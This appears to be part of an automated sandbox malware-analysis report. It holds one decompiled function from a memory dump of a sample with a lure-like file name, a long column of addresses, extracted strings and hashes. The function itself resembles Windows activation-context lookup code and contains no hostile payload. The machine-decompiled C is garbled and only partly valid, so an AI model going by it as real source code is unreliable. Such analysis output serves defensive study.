                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                  			E3336A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E3336A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E3336A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x334491e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E33354428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E3336A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E333DEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E333DEF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                                                                                                                                                  0x3336a178
                                                                                                                                                                                  0x3336a17f
                                                                                                                                                                                  0x3336a182
                                                                                                                                                                                  0x3336a18f
                                                                                                                                                                                  0x3336a4b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b77ce
                                                                                                                                                                                  0x333b77ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b77ce
                                                                                                                                                                                  0x3336a195
                                                                                                                                                                                  0x3336a195
                                                                                                                                                                                  0x3336a199
                                                                                                                                                                                  0x3336a1a1
                                                                                                                                                                                  0x3336a1a9
                                                                                                                                                                                  0x3336a1b1
                                                                                                                                                                                  0x333b77f3
                                                                                                                                                                                  0x333b77f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1b7
                                                                                                                                                                                  0x3336a1b7
                                                                                                                                                                                  0x3336a1c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1c6
                                                                                                                                                                                  0x3336a1c6
                                                                                                                                                                                  0x3336a1cc
                                                                                                                                                                                  0x3336a5dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a5e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a5e2
                                                                                                                                                                                  0x3336a1d2
                                                                                                                                                                                  0x3336a1d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1da
                                                                                                                                                                                  0x3336a1da
                                                                                                                                                                                  0x3336a1dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1e3
                                                                                                                                                                                  0x3336a1e3
                                                                                                                                                                                  0x3336a1e6
                                                                                                                                                                                  0x3336a1fa
                                                                                                                                                                                  0x3336a1fd
                                                                                                                                                                                  0x3336a5f0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a5f6
                                                                                                                                                                                  0x333b77fd
                                                                                                                                                                                  0x333b7802
                                                                                                                                                                                  0x333b7807
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7807
                                                                                                                                                                                  0x3336a203
                                                                                                                                                                                  0x3336a203
                                                                                                                                                                                  0x3336a208
                                                                                                                                                                                  0x3336a20b
                                                                                                                                                                                  0x3336a20f
                                                                                                                                                                                  0x3336a216
                                                                                                                                                                                  0x3336a21c
                                                                                                                                                                                  0x3336a224
                                                                                                                                                                                  0x3336a228
                                                                                                                                                                                  0x3336a22b
                                                                                                                                                                                  0x3336a233
                                                                                                                                                                                  0x3336a23b
                                                                                                                                                                                  0x3336a23f
                                                                                                                                                                                  0x3336a243
                                                                                                                                                                                  0x3336a247
                                                                                                                                                                                  0x3336a250
                                                                                                                                                                                  0x3336a252
                                                                                                                                                                                  0x3336a255
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a25b
                                                                                                                                                                                  0x3336a263
                                                                                                                                                                                  0x3336a26f
                                                                                                                                                                                  0x3336a26f
                                                                                                                                                                                  0x3336a277
                                                                                                                                                                                  0x3336a27d
                                                                                                                                                                                  0x3336a3ae
                                                                                                                                                                                  0x3336a3ae
                                                                                                                                                                                  0x3336a3b4
                                                                                                                                                                                  0x3336a3be
                                                                                                                                                                                  0x333b7823
                                                                                                                                                                                  0x333b7826
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b782c
                                                                                                                                                                                  0x333b782c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b782c
                                                                                                                                                                                  0x3336a3c4
                                                                                                                                                                                  0x3336a3c4
                                                                                                                                                                                  0x3336a3c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a3c9
                                                                                                                                                                                  0x3336a283
                                                                                                                                                                                  0x3336a283
                                                                                                                                                                                  0x3336a288
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a288
                                                                                                                                                                                  0x3336a265
                                                                                                                                                                                  0x3336a265
                                                                                                                                                                                  0x3336a269
                                                                                                                                                                                  0x3336a4bf
                                                                                                                                                                                  0x3336a4c2
                                                                                                                                                                                  0x3336a4c8
                                                                                                                                                                                  0x3336a4e3
                                                                                                                                                                                  0x333b780e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4e9
                                                                                                                                                                                  0x3336a4ec
                                                                                                                                                                                  0x333b7819
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4f2
                                                                                                                                                                                  0x3336a4f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4f2
                                                                                                                                                                                  0x3336a4ec
                                                                                                                                                                                  0x3336a4ca
                                                                                                                                                                                  0x3336a4ca
                                                                                                                                                                                  0x3336a4cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4d2
                                                                                                                                                                                  0x3336a4d2
                                                                                                                                                                                  0x3336a4d2
                                                                                                                                                                                  0x3336a4d7
                                                                                                                                                                                  0x3336a28c
                                                                                                                                                                                  0x3336a28e
                                                                                                                                                                                  0x333b7833
                                                                                                                                                                                  0x333b7838
                                                                                                                                                                                  0x333b7838
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a294
                                                                                                                                                                                  0x3336a2a5
                                                                                                                                                                                  0x3336a2ac
                                                                                                                                                                                  0x3336a3d2
                                                                                                                                                                                  0x3336a3d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a3e8
                                                                                                                                                                                  0x3336a3e8
                                                                                                                                                                                  0x3336a3ec
                                                                                                                                                                                  0x3336a3f0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a3f0
                                                                                                                                                                                  0x3336a2b2
                                                                                                                                                                                  0x3336a2b2
                                                                                                                                                                                  0x3336a2d2
                                                                                                                                                                                  0x3336a2d6
                                                                                                                                                                                  0x3336a2d8
                                                                                                                                                                                  0x3336a2da
                                                                                                                                                                                  0x3336a2dc
                                                                                                                                                                                  0x3336a2de
                                                                                                                                                                                  0x333b783a
                                                                                                                                                                                  0x333b783c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7842
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7842
                                                                                                                                                                                  0x3336a2e4
                                                                                                                                                                                  0x3336a2e4
                                                                                                                                                                                  0x3336a2e4
                                                                                                                                                                                  0x3336a2eb
                                                                                                                                                                                  0x333b78ed
                                                                                                                                                                                  0x333b78ed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a2f1
                                                                                                                                                                                  0x3336a2f1
                                                                                                                                                                                  0x3336a300
                                                                                                                                                                                  0x3336a300
                                                                                                                                                                                  0x3336a300
                                                                                                                                                                                  0x3336a30a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a310
                                                                                                                                                                                  0x3336a325
                                                                                                                                                                                  0x3336a32c
                                                                                                                                                                                  0x3336a4f7
                                                                                                                                                                                  0x3336a500
                                                                                                                                                                                  0x3336a502
                                                                                                                                                                                  0x3336a505
                                                                                                                                                                                  0x3336a50b
                                                                                                                                                                                  0x3336a5a5
                                                                                                                                                                                  0x3336a5b8
                                                                                                                                                                                  0x3336a5be
                                                                                                                                                                                  0x3336a5c2
                                                                                                                                                                                  0x3336a5cb
                                                                                                                                                                                  0x3336a5d1
                                                                                                                                                                                  0x3336a5d1
                                                                                                                                                                                  0x3336a5cb
                                                                                                                                                                                  0x3336a50b
                                                                                                                                                                                  0x3336a523
                                                                                                                                                                                  0x3336a549
                                                                                                                                                                                  0x3336a551
                                                                                                                                                                                  0x3336a525
                                                                                                                                                                                  0x3336a53c
                                                                                                                                                                                  0x3336a543
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a543
                                                                                                                                                                                  0x3336a332
                                                                                                                                                                                  0x3336a337
                                                                                                                                                                                  0x3336a393
                                                                                                                                                                                  0x3336a399
                                                                                                                                                                                  0x3336a339
                                                                                                                                                                                  0x3336a339
                                                                                                                                                                                  0x3336a342
                                                                                                                                                                                  0x3336a344
                                                                                                                                                                                  0x3336a34a
                                                                                                                                                                                  0x3336a34e
                                                                                                                                                                                  0x3336a355
                                                                                                                                                                                  0x3336a359
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a360
                                                                                                                                                                                  0x3336a363
                                                                                                                                                                                  0x3336a3fa
                                                                                                                                                                                  0x3336a3fc
                                                                                                                                                                                  0x333b7847
                                                                                                                                                                                  0x333b784f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7855
                                                                                                                                                                                  0x333b7855
                                                                                                                                                                                  0x333b7859
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b785f
                                                                                                                                                                                  0x333b785f
                                                                                                                                                                                  0x333b7862
                                                                                                                                                                                  0x333b7868
                                                                                                                                                                                  0x333b7892
                                                                                                                                                                                  0x333b7894
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b786a
                                                                                                                                                                                  0x333b786d
                                                                                                                                                                                  0x333b787e
                                                                                                                                                                                  0x333b788b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7880
                                                                                                                                                                                  0x333b7880
                                                                                                                                                                                  0x333b7885
                                                                                                                                                                                  0x333b789a
                                                                                                                                                                                  0x333b789a
                                                                                                                                                                                  0x333b789f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b789f
                                                                                                                                                                                  0x333b786f
                                                                                                                                                                                  0x333b7873
                                                                                                                                                                                  0x333b788e
                                                                                                                                                                                  0x333b788e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b788e
                                                                                                                                                                                  0x333b786d
                                                                                                                                                                                  0x333b7868
                                                                                                                                                                                  0x333b7859
                                                                                                                                                                                  0x3336a402
                                                                                                                                                                                  0x3336a402
                                                                                                                                                                                  0x3336a405
                                                                                                                                                                                  0x3336a554
                                                                                                                                                                                  0x3336a556
                                                                                                                                                                                  0x3336a55e
                                                                                                                                                                                  0x3336a564
                                                                                                                                                                                  0x3336a56a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a570
                                                                                                                                                                                  0x3336a570
                                                                                                                                                                                  0x3336a575
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a575
                                                                                                                                                                                  0x3336a40b
                                                                                                                                                                                  0x3336a40e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a414
                                                                                                                                                                                  0x3336a414
                                                                                                                                                                                  0x3336a418
                                                                                                                                                                                  0x3336a420
                                                                                                                                                                                  0x3336a426
                                                                                                                                                                                  0x3336a42c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a432
                                                                                                                                                                                  0x3336a432
                                                                                                                                                                                  0x3336a437
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a437
                                                                                                                                                                                  0x3336a42c
                                                                                                                                                                                  0x3336a40e
                                                                                                                                                                                  0x3336a405
                                                                                                                                                                                  0x3336a369
                                                                                                                                                                                  0x3336a369
                                                                                                                                                                                  0x3336a36c
                                                                                                                                                                                  0x333b78e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a372
                                                                                                                                                                                  0x3336a372
                                                                                                                                                                                  0x3336a374
                                                                                                                                                                                  0x3336a452
                                                                                                                                                                                  0x3336a459
                                                                                                                                                                                  0x3336a57e
                                                                                                                                                                                  0x3336a585
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a594
                                                                                                                                                                                  0x3336a594
                                                                                                                                                                                  0x3336a598
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a598
                                                                                                                                                                                  0x3336a45f
                                                                                                                                                                                  0x3336a45f
                                                                                                                                                                                  0x3336a47f
                                                                                                                                                                                  0x3336a483
                                                                                                                                                                                  0x3336a485
                                                                                                                                                                                  0x3336a487
                                                                                                                                                                                  0x3336a489
                                                                                                                                                                                  0x3336a48b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a491
                                                                                                                                                                                  0x3336a493
                                                                                                                                                                                  0x333b78a8
                                                                                                                                                                                  0x333b78b1
                                                                                                                                                                                  0x333b78c3
                                                                                                                                                                                  0x333b78c3
                                                                                                                                                                                  0x333b78cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b78d6
                                                                                                                                                                                  0x333b78dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b78de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b78de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b78dc
                                                                                                                                                                                  0x333b78c3
                                                                                                                                                                                  0x333b78b1
                                                                                                                                                                                  0x3336a499
                                                                                                                                                                                  0x3336a499
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a499
                                                                                                                                                                                  0x3336a48b
                                                                                                                                                                                  0x3336a37a
                                                                                                                                                                                  0x3336a37a
                                                                                                                                                                                  0x3336a37f
                                                                                                                                                                                  0x3336a381
                                                                                                                                                                                  0x3336a49b
                                                                                                                                                                                  0x3336a49b
                                                                                                                                                                                  0x3336a4a2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a4a8
                                                                                                                                                                                  0x3336a387
                                                                                                                                                                                  0x3336a387
                                                                                                                                                                                  0x3336a38c
                                                                                                                                                                                  0x3336a38e
                                                                                                                                                                                  0x3336a38e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a38c
                                                                                                                                                                                  0x3336a381
                                                                                                                                                                                  0x3336a374
                                                                                                                                                                                  0x3336a36c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a363
                                                                                                                                                                                  0x3336a360
                                                                                                                                                                                  0x3336a337
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a32c
                                                                                                                                                                                  0x333b78f1
                                                                                                                                                                                  0x333b78f1
                                                                                                                                                                                  0x333b78fc
                                                                                                                                                                                  0x333b7904
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b7904
                                                                                                                                                                                  0x3336a2eb
                                                                                                                                                                                  0x3336a2de
                                                                                                                                                                                  0x3336a2ac
                                                                                                                                                                                  0x3336a28e
                                                                                                                                                                                  0x3336a4cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a39c
                                                                                                                                                                                  0x3336a39c
                                                                                                                                                                                  0x3336a39f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a3a5
                                                                                                                                                                                  0x3336a3a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a3a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a39f
                                                                                                                                                                                  0x3336a250
                                                                                                                                                                                  0x3336a1e8
                                                                                                                                                                                  0x3336a1f1
                                                                                                                                                                                  0x333b77d8
                                                                                                                                                                                  0x333b77dd
                                                                                                                                                                                  0x333b77e2
                                                                                                                                                                                  0x333b77e7
                                                                                                                                                                                  0x333b77e7
                                                                                                                                                                                  0x333b77e9
                                                                                                                                                                                  0x333b77eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1f7
                                                                                                                                                                                  0x3336a1f7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336a1f7
                                                                                                                                                                                  0x3336a1f1
                                                                                                                                                                                  0x3336a1e6
                                                                                                                                                                                  0x3336a1dd
                                                                                                                                                                                  0x3336a1d4
                                                                                                                                                                                  0x3336a1cc
                                                                                                                                                                                  0x3336a1c0
                                                                                                                                                                                  0x3336a1b1
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 333B78F3
                                                                                                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333B77E2
                                                                                                                                                                                  • Actx , xrefs: 333B7819, 333B7880
                                                                                                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333B7807
                                                                                                                                                                                  • SsHd, xrefs: 3336A304
                                                                                                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 333B77DD, 333B7802
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                  • API String ID: 0-1988757188
                                                                                                                                                                                  • Opcode ID: 65dfc564849656ac2ded35800a22e1eb3cb596d4221a868f7f9ab866cf37947a
                                                                                                                                                                                  • Instruction ID: 48ef5bc1df7a9b146bcfec0e666cb3ca8348bf5086c7a8fbcddda93b2b9b13a8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65dfc564849656ac2ded35800a22e1eb3cb596d4221a868f7f9ab866cf37947a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E1ACB4B483018FE701CE24C8D0B1AB7E5BF84258F588A2DF9A5CB694DB31D885CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
